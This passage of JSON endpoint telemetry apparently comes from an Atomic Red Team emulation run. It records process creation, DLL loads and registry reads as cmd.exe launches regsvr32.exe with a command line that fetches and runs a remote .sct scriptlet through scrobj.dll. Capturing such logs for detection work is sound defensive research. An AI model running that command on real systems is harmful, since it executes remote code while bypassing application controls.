"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2652, - "ppid": 7036, - "process_name": 
"cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573237050000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573236980000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "command_line": "regsvr32.exe /s /u 
/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2012, - "ppid": 2652, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "subtype": "create", - "timestamp": 131883573237130000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}", - "unique_ppid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2652, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010AA385401}" - }, - { - "event_type": "image_load", - "image_name": "regsvr32.exe", - "image_path": "C:\\Windows\\System32\\regsvr32.exe", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - 
"image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "AcLayers.dll", - "image_path": "C:\\Windows\\System32\\AcLayers.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 2012, - 
"process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": 
"C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winspool.drv", - "image_path": "C:\\Windows\\System32\\winspool.drv", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", 
- "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237140000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc.dll", - "image_path": "C:\\Windows\\System32\\sfc.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "sfc_os.dll", - "image_path": "C:\\Windows\\System32\\sfc_os.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237300000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "scrobj.dll", - "image_path": "C:\\Windows\\System32\\scrobj.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": 
"image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "iertutil.dll", - "image_path": "C:\\Windows\\System32\\iertutil.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptbase.dll", - "image_path": "C:\\Windows\\System32\\cryptbase.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - 
"image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237450016, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "OnDemandConnRouteHelper.dll", - "image_path": 
"C:\\Windows\\System32\\OnDemandConnRouteHelper.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_value": "ZoneMap", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", - "registry_value": "ProxyBypass", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - 
"registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", - "registry_value": "IntranetName", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", - "registry_value": "UNCAsIntranet", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", - "registry_value": "AutoDetect", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass", - "registry_value": "ProxyBypass", - "timestamp": 131883573237930000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName", - "registry_value": "IntranetName", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet", - "registry_value": "UNCAsIntranet", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect", - "registry_value": "AutoDetect", - "timestamp": 131883573237930000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - 
"timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "registry", - "pid": 2164, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - 
"registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-B2AC-5C05-0000-0010E9B00100}" - }, - { - "event_type": "image_load", - "image_name": "crypt32.dll", - "image_path": "C:\\Windows\\System32\\crypt32.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238080000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "msasn1.dll", - "image_path": "C:\\Windows\\System32\\msasn1.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "dpapi.dll", - "image_path": "C:\\Windows\\System32\\dpapi.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "wintrust.dll", - "image_path": "C:\\Windows\\System32\\wintrust.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "cryptsp.dll", - "image_path": "C:\\Windows\\System32\\cryptsp.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": 
"{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "image_load", - "image_name": "rsaenh.dll", - "image_path": "C:\\Windows\\System32\\rsaenh.dll", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\Windows\\System32\\regsvr32.exe", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - "process_name": "regsvr32.exe", - "process_path": "C:\\WINDOWS\\system32\\regsvr32.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573238230000, - "unique_pid": "{42FC7E13-CBCB-5C05-0000-0010A0395401}" - }, - { - "event_type": "registry", - "pid": 2012, - 